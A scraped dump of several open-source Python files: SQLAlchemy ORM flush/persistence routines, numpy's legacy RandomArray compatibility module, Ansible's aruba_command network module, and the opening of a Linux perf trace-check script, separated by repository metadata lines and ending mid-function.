                        if history.added:
                            hasdata = True
            else:
                prop = mapper._columntoproperty[col]
                history = attributes.get_state_history(
                                state, prop.key,
                                attributes.PASSIVE_NO_INITIALIZE)
                if history.added:
                    if isinstance(history.added[0],
                                    sql.ClauseElement):
                        value_params[col] = history.added[0]
                    else:
                        value = history.added[0]
                        params[col.key] = value

                    if col in pks:
                        if history.deleted and \
                            not row_switch:
                            # if passive_updates and sync detected
                            # this was a  pk->pk sync, use the new
                            # value to locate the row, since the
                            # DB would already have set this
                            if ("pk_cascaded", state, col) in \
                                            uowtransaction.attributes:
                                value = history.added[0]
                                params[col._label] = value
                            else:
                                # use the old value to
                                # locate the row
                                value = history.deleted[0]
                                params[col._label] = value
                            hasdata = True
                        else:
                            # row switch logic can reach us here
                            # remove the pk from the update params
                            # so the update doesn't
                            # attempt to include the pk in the
                            # update statement
                            del params[col.key]
                            value = history.added[0]
                            params[col._label] = value
                            if value is None:
                                hasnull = True
                    else:
                        hasdata = True
                elif col in pks:
                    # unchanged pk column: still needed to match the row
                    value = state.manager[prop.key].impl.get(
                                    state, state_dict)
                    if value is None:
                        hasnull = True
                    params[col._label] = value
        if hasdata:
            if hasnull:
                raise sa_exc.FlushError(
                            "Can't update table "
                            "using NULL for primary "
                            "key value")
            update.append((state, state_dict, params, mapper,
                            connection, value_params))
    return update
def _collect_post_update_commands(base_mapper, uowtransaction, table,
                        states_to_update, post_update_cols):
    """Identify sets of values to use in UPDATE statements for a
    list of states within a post_update operation.

    Only columns present in ``post_update_cols`` whose attribute history
    shows a new value are included; primary key columns are added (under
    ``col._label``) to match the row.

    """

    update = []
    for state, state_dict, mapper, connection in states_to_update:
        if table not in mapper._pks_by_table:
            continue
        pks = mapper._pks_by_table[table]
        params = {}
        hasdata = False

        for col in mapper._cols_by_table[table]:
            if col in pks:
                params[col._label] = \
                        mapper._get_state_attr_by_column(
                                        state,
                                        state_dict, col)
            elif col in post_update_cols:
                prop = mapper._columntoproperty[col]
                history = attributes.get_state_history(
                            state, prop.key,
                            attributes.PASSIVE_NO_INITIALIZE)
                if history.added:
                    value = history.added[0]
                    params[col.key] = value
                    hasdata = True
        if hasdata:
            update.append((state, state_dict, params, mapper,
                            connection))
    return update
def _collect_delete_commands(base_mapper, uowtransaction, table,
                                states_to_delete):
    """Identify values to use in DELETE statements for a list of
    states to be deleted.

    Returns a dict mapping each Connection to the list of parameter
    dictionaries (primary key values, plus the committed version id when
    versioning applies) to execute on it.
    """

    delete = util.defaultdict(list)

    for state, state_dict, mapper, has_identity, connection \
                                        in states_to_delete:
        if not has_identity or table not in mapper._pks_by_table:
            continue

        params = {}
        delete[connection].append(params)
        for col in mapper._pks_by_table[table]:
            params[col.key] = \
                    value = \
                    mapper._get_state_attr_by_column(
                                    state, state_dict, col)
            if value is None:
                raise sa_exc.FlushError(
                            "Can't delete from table "
                            "using NULL for primary "
                            "key value")

        if mapper.version_id_col is not None and \
                    table.c.contains_column(mapper.version_id_col):
            params[mapper.version_id_col.key] = \
                        mapper._get_committed_state_attr_by_column(
                                state, state_dict,
                                mapper.version_id_col)
    return delete
def _emit_update_statements(base_mapper, uowtransaction,
                        cached_connections, mapper, table, update):
    """Emit UPDATE statements corresponding to value lists collected
    by _collect_update_commands()."""

    needs_version_id = mapper.version_id_col is not None and \
                table.c.contains_column(mapper.version_id_col)

    def update_stmt():
        # WHERE clause matches on primary key (and version id when present);
        # the compiled statement is memoized per table on the base mapper.
        clause = sql.and_()

        for col in mapper._pks_by_table[table]:
            clause.clauses.append(col == sql.bindparam(col._label,
                                            type_=col.type))

        if needs_version_id:
            clause.clauses.append(mapper.version_id_col ==\
                    sql.bindparam(mapper.version_id_col._label,
                                    type_=mapper.version_id_col.type))

        return table.update(clause)

    statement = base_mapper._memo(('update', table), update_stmt)

    rows = 0
    for state, state_dict, params, mapper, \
                connection, value_params in update:

        if value_params:
            # SQL expressions can't go through the cached/executemany path
            c = connection.execute(
                                statement.values(value_params),
                                params)
        else:
            c = cached_connections[connection].\
                                execute(statement, params)

        _postfetch(
                mapper,
                uowtransaction,
                table,
                state,
                state_dict,
                c.context.prefetch_cols,
                c.context.postfetch_cols,
                c.context.compiled_parameters[0],
                value_params)
        rows += c.rowcount

    # verify that every row was actually matched, detecting stale data /
    # concurrent modification when the dialect reports accurate rowcounts
    if connection.dialect.supports_sane_rowcount:
        if rows != len(update):
            raise orm_exc.StaleDataError(
                    "UPDATE statement on table '%s' expected to "
                    "update %d row(s); %d were matched." %
                    (table.description, len(update), rows))

    elif needs_version_id:
        util.warn("Dialect %s does not support updated rowcount "
                "- versioning cannot be verified." %
                c.dialect.dialect_description,
                stacklevel=12)
def _emit_insert_statements(base_mapper, uowtransaction,
                        cached_connections, table, insert):
    """Emit INSERT statements corresponding to value lists collected
    by _collect_insert_commands()."""

    statement = base_mapper._memo(('insert', table), table.insert)

    # group records by (connection, param keys, has SQL-expression values,
    # has all pks) so that compatible rows can share an executemany() call
    for (connection, pkeys, hasvalue, has_all_pks), \
        records in groupby(insert,
                            lambda rec: (rec[4],
                                    rec[2].keys(),
                                    bool(rec[5]),
                                    rec[6])
    ):
        if has_all_pks and not hasvalue:
            # fast path: all pk values are known, so executemany the batch
            records = list(records)
            multiparams = [rec[2] for rec in records]
            c = cached_connections[connection].\
                                execute(statement, multiparams)

            for (state, state_dict, params, mapper,
                    conn, value_params, has_all_pks), \
                    last_inserted_params in \
                    zip(records, c.context.compiled_parameters):
                _postfetch(
                        mapper,
                        uowtransaction,
                        table,
                        state,
                        state_dict,
                        c.context.prefetch_cols,
                        c.context.postfetch_cols,
                        last_inserted_params,
                        value_params)

        else:
            # slow path: execute row-by-row so generated primary keys can
            # be retrieved per statement
            for state, state_dict, params, mapper, \
                        connection, value_params, \
                        has_all_pks in records:

                if value_params:
                    result = connection.execute(
                                        statement.values(value_params),
                                        params)
                else:
                    result = cached_connections[connection].\
                                        execute(statement, params)

                primary_key = result.context.inserted_primary_key

                if primary_key is not None:
                    # set primary key attributes
                    for pk, col in zip(primary_key,
                                    mapper._pks_by_table[table]):
                        prop = mapper._columntoproperty[col]
                        if state_dict.get(prop.key) is None:
                            # TODO: would rather say:
                            #state_dict[prop.key] = pk
                            mapper._set_state_attr_by_column(
                                        state,
                                        state_dict,
                                        col, pk)

                _postfetch(
                        mapper,
                        uowtransaction,
                        table,
                        state,
                        state_dict,
                        result.context.prefetch_cols,
                        result.context.postfetch_cols,
                        result.context.compiled_parameters[0],
                        value_params)
def _emit_post_update_statements(base_mapper, uowtransaction,
                            cached_connections, mapper, table, update):
    """Emit UPDATE statements corresponding to value lists collected
    by _collect_post_update_commands()."""

    def update_stmt():
        # rows are matched on primary key only
        clause = sql.and_()

        for col in mapper._pks_by_table[table]:
            clause.clauses.append(col == sql.bindparam(col._label,
                                            type_=col.type))

        return table.update(clause)

    statement = base_mapper._memo(('post_update', table), update_stmt)

    # execute each UPDATE in the order according to the original
    # list of states to guarantee row access order, but
    # also group them into common (connection, cols) sets
    # to support executemany().
    for key, grouper in groupby(
        update, lambda rec: (rec[4], rec[2].keys())
    ):
        connection = key[0]
        multiparams = [params for state, state_dict,
                                params, mapper, conn in grouper]
        cached_connections[connection].\
                            execute(statement, multiparams)
def _emit_delete_statements(base_mapper, uowtransaction, cached_connections,
                    mapper, table, delete):
    """Emit DELETE statements corresponding to value lists collected
    by _collect_delete_commands()."""

    need_version_id = mapper.version_id_col is not None and \
        table.c.contains_column(mapper.version_id_col)

    def delete_stmt():
        # rows are matched on primary key, plus the version id when the
        # mapper is versioned against this table
        clause = sql.and_()
        for col in mapper._pks_by_table[table]:
            clause.clauses.append(
                    col == sql.bindparam(col.key, type_=col.type))

        if need_version_id:
            clause.clauses.append(
                mapper.version_id_col ==
                sql.bindparam(
                        mapper.version_id_col.key,
                        type_=mapper.version_id_col.type
                )
            )

        return table.delete(clause)

    for connection, del_objects in delete.iteritems():
        statement = base_mapper._memo(('delete', table), delete_stmt)

        connection = cached_connections[connection]

        if need_version_id:
            # TODO: need test coverage for this [ticket:1761]
            if connection.dialect.supports_sane_rowcount:
                rows = 0
                # execute deletes individually so that versioned
                # rows can be verified
                for params in del_objects:
                    c = connection.execute(statement, params)
                    rows += c.rowcount
                if rows != len(del_objects):
                    raise orm_exc.StaleDataError(
                        "DELETE statement on table '%s' expected to "
                        "delete %d row(s); %d were matched." %
                        (table.description, len(del_objects), c.rowcount)
                    )
            else:
                util.warn(
                    "Dialect %s does not support deleted rowcount "
                    "- versioning cannot be verified." %
                    connection.dialect.dialect_description,
                    stacklevel=12)
                connection.execute(statement, del_objects)
        else:
            # unversioned: a single executemany() handles the batch
            connection.execute(statement, del_objects)
def _finalize_insert_update_commands(base_mapper, uowtransaction,
                            states_to_insert, states_to_update):
    """finalize state on states that have been inserted or updated,
    including calling after_insert/after_update events.

    """
    for state, state_dict, mapper, connection, has_identity, \
                    instance_key, row_switch in states_to_insert + \
                                                    states_to_update:

        if mapper._readonly_props:
            # expire server-computed / read-only attributes so they
            # reload fresh values on next access
            readonly = state.unmodified_intersection(
                [p.key for p in mapper._readonly_props
                    if p.expire_on_flush or p.key not in state.dict]
            )
            if readonly:
                state.expire_attributes(state.dict, readonly)

        # if eager_defaults option is enabled,
        # refresh whatever has been expired.
        if base_mapper.eager_defaults and state.unloaded:
            state.key = base_mapper._identity_key_from_state(state)
            uowtransaction.session.query(base_mapper)._load_on_ident(
                state.key, refresh_state=state,
                only_load_props=state.unloaded)

        # call after_XXX extensions
        if not has_identity:
            mapper.dispatch.after_insert(mapper, connection, state)
        else:
            mapper.dispatch.after_update(mapper, connection, state)
def _postfetch(mapper, uowtransaction, table,
                state, dict_, prefetch_cols, postfetch_cols,
                            params, value_params):
    """Expire attributes in need of newly persisted database state,
    after an INSERT or UPDATE statement has proceeded for that
    state."""

    if mapper.version_id_col is not None:
        prefetch_cols = list(prefetch_cols) + [mapper.version_id_col]

    # prefetched values were computed client-side and are available in
    # params; populate them directly on the instance
    for c in prefetch_cols:
        if c.key in params and c in mapper._columntoproperty:
            mapper._set_state_attr_by_column(state, dict_, c, params[c.key])

    # postfetched values were generated by the database; expire the
    # attributes so they load on next access
    if postfetch_cols:
        state.expire_attributes(state.dict,
                            [mapper._columntoproperty[c].key
                            for c in postfetch_cols if c in
                            mapper._columntoproperty]
                        )

    # synchronize newly inserted ids from one table to the next
    # TODO: this still goes a little too often.  would be nice to
    # have definitive list of "columns that changed" here
    for m, equated_pairs in mapper._table_to_equated[table]:
        sync.populate(state, m, state, m,
                                        equated_pairs,
                                        uowtransaction,
                                        mapper.passive_updates)
def _connections_for_states(base_mapper, uowtransaction, states):
    """Return an iterator of (state, state.dict, mapper, connection).

    The states are sorted according to _sort_states, then paired
    with the connection they should be using for the given
    unit of work transaction.

    """
    # if session has a connection callable,
    # organize individual states with the connection
    # to use for update
    if uowtransaction.session.connection_callable:
        connection_callable = \
                uowtransaction.session.connection_callable
    else:
        connection = None
        connection_callable = None

    for state in _sort_states(states):
        if connection_callable:
            # per-state connection (e.g. horizontal sharding)
            connection = connection_callable(base_mapper, state.obj())
        elif not connection:
            # lazily resolve a single shared connection on first use
            connection = uowtransaction.transaction.connection(
                                    base_mapper)

        mapper = _state_mapper(state)

        yield state, state.dict, mapper, connection
def _cached_connection_dict(base_mapper):
    # Lazily maps each Connection to a copy of itself configured with the
    # base mapper's compiled-statement cache.
    def _with_compiled_cache(conn):
        return conn.execution_options(
                    compiled_cache=base_mapper._compiled_cache)
    return util.PopulateDict(_with_compiled_cache)
def _sort_states(states):
pending = set(states)
persistent = set(s for s in pending if s.key is not None)
pending.difference_update(persistent)
return sorted(pending, key=operator.attrgetter("insert_order")) + \
sorted(persistent, key=lambda q:q.key[1])
| gpl-3.0 |
haripradhan/MissionPlanner | Lib/site-packages/numpy/oldnumeric/random_array.py | 87 | 11454 | # Backward compatible module for RandomArray
# Public API mirrors the names exported by the historical RandomArray module.
__all__ = ['ArgumentError','F','beta','binomial','chi_square', 'exponential',
           'gamma', 'get_seed', 'mean_var_test', 'multinomial',
           'multivariate_normal', 'negative_binomial', 'noncentral_F',
           'noncentral_chi_square', 'normal', 'permutation', 'poisson',
           'randint', 'random', 'random_integers', 'seed', 'standard_normal',
           'uniform']

# Backward-compatible alias: the old RandomArray module raised ArgumentError;
# it is now just ValueError.
ArgumentError = ValueError
import numpy.random.mtrand as mt
import numpy as np
def seed(x=0, y=0):
    """Seed the underlying generator.

    A zero in either position (the default) requests automatic seeding;
    otherwise the pair ``(x, y)`` is used as the seed.
    """
    if x != 0 and y != 0:
        mt.seed((x, y))
    else:
        mt.seed()
def get_seed():
    """Unsupported in the compatibility layer.

    Raises:
        NotImplementedError: always; use numpy.random.get_state() /
            numpy.random.set_state() instead.
    """
    # The Python-2-only ``raise Exc, msg`` statement was replaced with the
    # call form, which is valid in both Python 2 and 3.
    raise NotImplementedError(
          "If you want to save the state of the random number generator.\n"
          "Then you should use obj = numpy.random.get_state() followed by.\n"
          "numpy.random.set_state(obj).")
def random(shape=[]):
    """Uniform [0, 1) samples in the requested shape; a plain scalar is
    returned when shape is the default []."""
    size = None if shape == [] else shape
    return mt.random_sample(size)
def uniform(minimum, maximum, shape=[]):
    """Reals drawn uniformly from [minimum, maximum) in the requested
    shape; a scalar when shape is the default []."""
    size = None if shape == [] else shape
    return mt.uniform(minimum, maximum, size)
def randint(minimum, maximum=None, shape=[]):
    """randint(min, max, shape=[]) = random integers >=min, < max
    If max not given, random integers >= 0, <min

    Raises ArgumentError (ValueError) if either bound is not an int.
    """
    if not isinstance(minimum, int):
        # call form of raise: valid in Python 2 and 3 (the old
        # ``raise ArgumentError, "..."`` statement is Python-2-only)
        raise ArgumentError("randint requires first argument integer")
    if maximum is None:
        maximum = minimum
        minimum = 0
    if not isinstance(maximum, int):
        raise ArgumentError("randint requires second argument integer")
    a = ((maximum-minimum)* random(shape))
    if isinstance(a, np.ndarray):
        # np.int was a deprecated alias for the builtin int and was removed
        # in NumPy 1.24; the builtin is equivalent here.
        return minimum + a.astype(int)
    else:
        return minimum + int(a)
def random_integers(maximum, minimum=1, shape=[]):
    """Random integers drawn inclusively between minimum and maximum."""
    upper_exclusive = maximum + 1
    return randint(minimum, upper_exclusive, shape)
def permutation(n):
    """Return the indices 0..n-1 in a uniformly random order."""
    shuffled = mt.permutation(n)
    return shuffled
def standard_normal(shape=[]):
    """Samples from the standard normal distribution (mean 0, std 1) in
    the requested shape; a scalar when shape is the default []."""
    return mt.standard_normal(None if shape == [] else shape)
def normal(mean, std, shape=[]):
    """Normally distributed samples with the given mean and standard
    deviation, in the requested shape (scalar for the default [])."""
    size = None if shape == [] else shape
    return mt.normal(mean, std, size)
def multivariate_normal(mean, cov, shape=[]):
    """Multivariate-normal samples.

    ``mean`` is 1-D with n elements and ``cov`` is an n x n covariance
    matrix.  With the default shape a single 1-D sample of length n is
    returned; otherwise the result has shape ``tuple(shape) + (n,)`` and
    ``output[i, j, ..., :]`` is one multivariate-normal draw.
    """
    size = None if shape == [] else shape
    return mt.multivariate_normal(mean, cov, size)
def exponential(mean, shape=[]):
    """Exponentially distributed samples with the given mean, in the
    requested shape (scalar for the default [])."""
    size = None if shape == [] else shape
    return mt.exponential(mean, size)
def beta(a, b, shape=[]):
    """Beta(a, b) distributed samples in the requested shape (scalar for
    the default [])."""
    size = None if shape == [] else shape
    return mt.beta(a, b, size)
def gamma(a, r, shape=[]):
    """Gamma-distributed samples with shape parameter ``a`` and scale
    ``r``, in the requested array shape (scalar for the default [])."""
    size = None if shape == [] else shape
    return mt.gamma(a, r, size)
def F(dfn, dfd, shape=[]):
    """F-distributed samples with ``dfn`` numerator and ``dfd``
    denominator degrees of freedom, in the requested shape."""
    size = None if shape == [] else shape
    return mt.f(dfn, dfd, size)
def noncentral_F(dfn, dfd, nconc, shape=[]):
    """Noncentral-F samples with ``dfn``/``dfd`` degrees of freedom and
    noncentrality parameter ``nconc``, in the requested shape."""
    size = None if shape == [] else shape
    return mt.noncentral_f(dfn, dfd, nconc, size)
def chi_square(df, shape=[]):
    """Chi-squared samples with ``df`` degrees of freedom, in the
    requested shape (scalar for the default [])."""
    size = None if shape == [] else shape
    return mt.chisquare(df, size)
def noncentral_chi_square(df, nconc, shape=[]):
    """Noncentral chi-squared samples with ``df`` degrees of freedom and
    noncentrality parameter ``nconc``, in the requested shape."""
    size = None if shape == [] else shape
    return mt.noncentral_chisquare(df, nconc, size)
def binomial(trials, p, shape=[]):
    """Binomially distributed random integers.

    ``trials`` is the number of trials per draw and ``p`` the per-trial
    success probability; the result has the requested shape.
    """
    size = None if shape == [] else shape
    return mt.binomial(trials, p, size)
def negative_binomial(trials, p, shape=[]):
    """Negative-binomially distributed random integers.

    ``trials`` is the number of successes required and ``p`` the
    per-trial success probability; the result has the requested shape.
    """
    size = None if shape == [] else shape
    return mt.negative_binomial(trials, p, size)
def multinomial(trials, probs, shape=[]):
    """Multinomially distributed integer count vectors.

    ``trials`` is the number of trials per draw and ``probs`` a 1-D
    sequence of event probabilities.  With the default shape a single
    1-D count vector is returned; otherwise ``output[i, j, ..., :]`` is
    one multinomial draw.
    """
    size = None if shape == [] else shape
    return mt.multinomial(trials, probs, size)
def poisson(mean, shape=[]):
    """Poisson-distributed random integers with the given mean, in the
    requested shape (scalar for the default [])."""
    size = None if shape == [] else shape
    return mt.poisson(mean, size)
def mean_var_test(x, type, mean, var, skew=[]):
    # Diagnostic helper: prints (does not assert) how closely the sample
    # mean / variance / skewness of ``x`` match the expected distribution
    # parameters.  NOTE: ``type`` here is a descriptive string and shadows
    # the builtin of the same name; Python-2 print statements throughout.
    n = len(x) * 1.0
    x_mean = np.sum(x,axis=0)/n
    x_minus_mean = x - x_mean
    # unbiased sample variance (divides by n - 1)
    x_var = np.sum(x_minus_mean*x_minus_mean,axis=0)/(n-1.0)
    print "\nAverage of ", len(x), type
    print "(should be about ", mean, "):", x_mean
    print "Variance of those random numbers (should be about ", var, "):", x_var
    if skew != []:
        # NOTE(review): the 9998. divisor assumes a sample size of 10000
        # (n - 2); this only matches the callers in this module's test().
        x_skew = (np.sum(x_minus_mean*x_minus_mean*x_minus_mean,axis=0)/9998.)/x_var**(3./2.)
        print "Skewness of those random numbers (should be about ", skew, "):", x_skew
def test():
    # Smoke test for the legacy RandomArray-style wrappers: exercises the
    # state round-trip and each distribution, printing sample statistics for
    # manual inspection.  Python 2 only (print statements, string raise form).
    obj = mt.get_state()
    mt.set_state(obj)
    obj2 = mt.get_state()
    # set_state/get_state must round-trip exactly; element 1 is the key array.
    if (obj2[1] - obj[1]).any():
        raise SystemExit, "Failed seed test."
    print "First random number is", random()
    print "Average of 10000 random numbers is", np.sum(random(10000),axis=0)/10000.
    x = random([10,1000])
    if len(x.shape) != 2 or x.shape[0] != 10 or x.shape[1] != 1000:
        raise SystemExit, "random returned wrong shape"
    x.shape = (10000,)
    print "Average of 100 by 100 random numbers is", np.sum(x,axis=0)/10000.
    y = uniform(0.5,0.6, (1000,10))
    if len(y.shape) !=2 or y.shape[0] != 1000 or y.shape[1] != 10:
        raise SystemExit, "uniform returned wrong shape"
    y.shape = (10000,)
    # uniform(0.5, 0.6) must stay strictly inside the open interval.
    if np.minimum.reduce(y) <= 0.5 or np.maximum.reduce(y) >= 0.6:
        raise SystemExit, "uniform returned out of desired range"
    print "randint(1, 10, shape=[50])"
    print randint(1, 10, shape=[50])
    print "permutation(10)", permutation(10)
    print "randint(3,9)", randint(3,9)
    print "random_integers(10, shape=[20])"
    print random_integers(10, shape=[20])
    s = 3.0
    x = normal(2.0, s, [10, 1000])
    if len(x.shape) != 2 or x.shape[0] != 10 or x.shape[1] != 1000:
        raise SystemExit, "standard_normal returned wrong shape"
    x.shape = (10000,)
    mean_var_test(x, "normally distributed numbers with mean 2 and variance %f"%(s**2,), 2, s**2, 0)
    x = exponential(3, 10000)
    mean_var_test(x, "random numbers exponentially distributed with mean %f"%(s,), s, s**2, 2)
    # Single multivariate normal draw: 1-D result of length 2.
    x = multivariate_normal(np.array([10,20]), np.array(([1,2],[2,4])))
    print "\nA multivariate normal", x
    if x.shape != (2,): raise SystemExit, "multivariate_normal returned wrong shape"
    x = multivariate_normal(np.array([10,20]), np.array([[1,2],[2,4]]), [4,3])
    print "A 4x3x2 array containing multivariate normals"
    print x
    if x.shape != (4,3,2): raise SystemExit, "multivariate_normal returned wrong shape"
    x = multivariate_normal(np.array([-100,0,100]), np.array([[3,2,1],[2,2,1],[1,1,1]]), 10000)
    x_mean = np.sum(x,axis=0)/10000.
    print "Average of 10000 multivariate normals with mean [-100,0,100]"
    print x_mean
    x_minus_mean = x - x_mean
    print "Estimated covariance of 10000 multivariate normals with covariance [[3,2,1],[2,2,1],[1,1,1]]"
    print np.dot(np.transpose(x_minus_mean),x_minus_mean)/9999.
    x = beta(5.0, 10.0, 10000)
    mean_var_test(x, "beta(5.,10.) random numbers", 0.333, 0.014)
    x = gamma(.01, 2., 10000)
    mean_var_test(x, "gamma(.01,2.) random numbers", 2*100, 2*100*100)
    x = chi_square(11., 10000)
    mean_var_test(x, "chi squared random numbers with 11 degrees of freedom", 11, 22, 2*np.sqrt(2./11.))
    x = F(5., 10., 10000)
    mean_var_test(x, "F random numbers with 5 and 10 degrees of freedom", 1.25, 1.35)
    x = poisson(50., 10000)
    mean_var_test(x, "poisson random numbers with mean 50", 50, 50, 0.14)
    print "\nEach element is the result of 16 binomial trials with probability 0.5:"
    print binomial(16, 0.5, 16)
    print "\nEach element is the result of 16 negative binomial trials with probability 0.5:"
    print negative_binomial(16, 0.5, [16,])
    print "\nEach row is the result of 16 multinomial trials with probabilities [0.1, 0.5, 0.1 0.3]:"
    x = multinomial(16, [0.1, 0.5, 0.1], 8)
    print x
    print "Mean = ", np.sum(x,axis=0)/8.
if __name__ == '__main__':
    # Run the distribution smoke tests when executed as a script.
    test()
| gpl-3.0 |
lmprice/ansible | lib/ansible/modules/network/aruba/aruba_command.py | 102 | 6777 | #!/usr/bin/python
#
# Copyright: Ansible Team
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = """
---
module: aruba_command
version_added: "2.4"
author: "James Mighion (@jmighion)"
short_description: Run commands on remote devices running Aruba Mobility Controller
description:
- Sends arbitrary commands to an aruba node and returns the results
read from the device. This module includes an
argument that will cause the module to wait for a specific condition
before returning or timing out if the condition is not met.
- This module does not support running commands in configuration mode.
Please use M(aruba_config) to configure Aruba devices.
extends_documentation_fragment: aruba
options:
commands:
description:
- List of commands to send to the remote aruba device over the
configured provider. The resulting output from the command
is returned. If the I(wait_for) argument is provided, the
module is not returned until the condition is satisfied or
the number of retries has expired.
required: true
wait_for:
description:
- List of conditions to evaluate against the output of the
command. The task will wait for each condition to be true
before moving forward. If the conditional is not true
within the configured number of retries, the task fails.
See examples.
aliases: ['waitfor']
match:
description:
- The I(match) argument is used in conjunction with the
I(wait_for) argument to specify the match policy. Valid
values are C(all) or C(any). If the value is set to C(all)
then all conditionals in the wait_for must be satisfied. If
the value is set to C(any) then only one of the values must be
satisfied.
default: all
choices: ['any', 'all']
retries:
description:
- Specifies the number of retries a command should by tried
before it is considered failed. The command is run on the
target device every retry and evaluated against the
I(wait_for) conditions.
default: 10
interval:
description:
- Configures the interval in seconds to wait between retries
of the command. If the command does not pass the specified
conditions, the interval indicates how long to wait before
trying the command again.
default: 1
"""
EXAMPLES = """
tasks:
- name: run show version on remote devices
aruba_command:
commands: show version
- name: run show version and check to see if output contains Aruba
aruba_command:
commands: show version
wait_for: result[0] contains Aruba
- name: run multiple commands on remote nodes
aruba_command:
commands:
- show version
- show interfaces
- name: run multiple commands and evaluate the output
aruba_command:
commands:
- show version
- show interfaces
wait_for:
- result[0] contains Aruba
- result[1] contains Loopback0
"""
RETURN = """
stdout:
description: The set of responses from the commands
returned: always
type: list
sample: ['...', '...']
stdout_lines:
description: The value of stdout split into a list
returned: always
type: list
sample: [['...', '...'], ['...'], ['...']]
failed_conditions:
description: The list of conditionals that have failed
returned: failed
type: list
sample: ['...', '...']
"""
import time
from ansible.module_utils.network.aruba.aruba import run_commands
from ansible.module_utils.network.aruba.aruba import aruba_argument_spec, check_args
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.network.common.utils import ComplexList
from ansible.module_utils.network.common.parsing import Conditional
from ansible.module_utils.six import string_types
def to_lines(stdout):
    """Yields each command response, splitting string responses into a
    list of lines; non-string responses pass through unchanged."""
    for response in stdout:
        if isinstance(response, string_types):
            yield str(response).split('\n')
        else:
            yield response
def parse_commands(module, warnings):
    """Normalizes the `commands` argument and screens unsupported entries.

    In check mode, non-`show` commands only produce a warning (they are
    skipped by the connection layer); configuration-mode commands fail the
    module outright.

    :param module: the AnsibleModule instance (provides params/check_mode).
    :param warnings: list that check-mode warnings are appended to.
    :returns: the normalized list of command dicts.
    """
    command = ComplexList(dict(
        command=dict(key=True),
        prompt=dict(),
        answer=dict()
    ), module)
    commands = command(module.params['commands'])
    # The original loop used enumerate() but never consumed the index.
    for item in commands:
        if module.check_mode and not item['command'].startswith('show'):
            warnings.append(
                'only show commands are supported when using check mode, not '
                'executing `%s`' % item['command']
            )
        elif item['command'].startswith('conf'):
            module.fail_json(
                msg='aruba_command does not support running config mode '
                'commands. Please use aruba_config instead'
            )
    return commands
def main():
    """Main entry point for module execution.

    Runs the requested commands, retrying until every wait_for conditional
    is satisfied (or any one of them, with match=any), then returns the
    responses as stdout/stdout_lines.
    """
    argument_spec = dict(
        commands=dict(type='list', required=True),
        wait_for=dict(type='list', aliases=['waitfor']),
        match=dict(default='all', choices=['all', 'any']),
        retries=dict(default=10, type='int'),
        interval=dict(default=1, type='int')
    )
    # Merge in the provider/connection options shared by all aruba modules.
    argument_spec.update(aruba_argument_spec)
    module = AnsibleModule(argument_spec=argument_spec,
                           supports_check_mode=True)
    result = {'changed': False}
    warnings = list()
    check_args(module, warnings)
    commands = parse_commands(module, warnings)
    result['warnings'] = warnings
    wait_for = module.params['wait_for'] or list()
    conditionals = [Conditional(c) for c in wait_for]
    retries = module.params['retries']
    interval = module.params['interval']
    match = module.params['match']
    # Satisfied conditionals are removed; the loop ends when none remain or
    # retries are exhausted.
    # NOTE(review): if a user sets retries=0 the loop never runs and
    # `responses` below is unbound -- verify upstream validation covers this.
    while retries > 0:
        responses = run_commands(module, commands)
        # Iterate over a copy so removal during iteration is safe.
        for item in list(conditionals):
            if item(responses):
                if match == 'any':
                    conditionals = list()
                    break
                conditionals.remove(item)
        if not conditionals:
            break
        time.sleep(interval)
        retries -= 1
    # Any conditional still pending after the retry budget means failure.
    if conditionals:
        failed_conditions = [item.raw for item in conditionals]
        msg = 'One or more conditional statements have not been satisfied'
        module.fail_json(msg=msg, failed_conditions=failed_conditions)
    result.update({
        'changed': False,
        'stdout': responses,
        'stdout_lines': list(to_lines(responses))
    })
    module.exit_json(**result)
if __name__ == '__main__':
    # Allow direct execution during development; Ansible normally imports main.
    main()
| gpl-3.0 |
CyanogenMod/android_kernel_htc_enrc2b | tools/perf/scripts/python/check-perf-trace.py | 11214 | 2503 | # perf script event handlers, generated by perf script -g python
# (c) 2010, Tom Zanussi <tzanussi@gmail.com>
# Licensed under the terms of the GNU GPL License version 2
#
# This script tests basic functionality such as flag and symbol
# strings, common_xxx() calls back into perf, begin, end, unhandled
# events, etc. Basically, if this script runs successfully and
# displays expected results, Python scripting support should be ok.
import os
import sys
sys.path.append(os.environ['PERF_EXEC_PATH'] + \
'/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from Core import *
from perf_trace_context import *
unhandled = autodict()
def trace_begin():
    # Called once by perf before any event is processed.
    print "trace_begin"
    pass
def trace_end():
    # Called once by perf after the last event; report any event types that
    # had no dedicated handler.
    print_unhandled()
def irq__softirq_entry(event_name, context, common_cpu,
        common_secs, common_nsecs, common_pid, common_comm,
        vec):
    # Handler for irq:softirq_entry: print the common header/fields plus the
    # softirq vector decoded to its symbolic name via symbol_str().
    print_header(event_name, common_cpu, common_secs, common_nsecs,
                 common_pid, common_comm)
    print_uncommon(context)
    print "vec=%s\n" % \
        (symbol_str("irq__softirq_entry", "vec", vec)),
def kmem__kmalloc(event_name, context, common_cpu,
        common_secs, common_nsecs, common_pid, common_comm,
        call_site, ptr, bytes_req, bytes_alloc,
        gfp_flags):
    # Handler for kmem:kmalloc: print the common header/fields plus the
    # allocation details, with gfp_flags rendered as flag names.
    print_header(event_name, common_cpu, common_secs, common_nsecs,
                 common_pid, common_comm)
    print_uncommon(context)
    print "call_site=%u, ptr=%u, bytes_req=%u, " \
        "bytes_alloc=%u, gfp_flags=%s\n" % \
        (call_site, ptr, bytes_req, bytes_alloc,
        flag_str("kmem__kmalloc", "gfp_flags", gfp_flags)),
def trace_unhandled(event_name, context, event_fields_dict):
    # Count events that have no dedicated handler.  On the first occurrence
    # `unhandled[event_name]` auto-creates a nested autodict, which cannot be
    # incremented; the resulting TypeError seeds the counter at 1.
    try:
        unhandled[event_name] += 1
    except TypeError:
        unhandled[event_name] = 1
def print_header(event_name, cpu, secs, nsecs, pid, comm):
    # One-line prefix shared by all handlers; the trailing comma suppresses
    # the newline so the handler can append its own fields.
    print "%-20s %5u %05u.%09u %8u %-20s " % \
        (event_name, cpu, secs, nsecs, pid, comm),
# print trace fields not included in handler args
def print_uncommon(context):
    # Pull the extra common fields (preempt count, flags, lock depth) back
    # out of perf via the context object.
    print "common_preempt_count=%d, common_flags=%s, common_lock_depth=%d, " \
        % (common_pc(context), trace_flag_str(common_flags(context)), \
        common_lock_depth(context))
def print_unhandled():
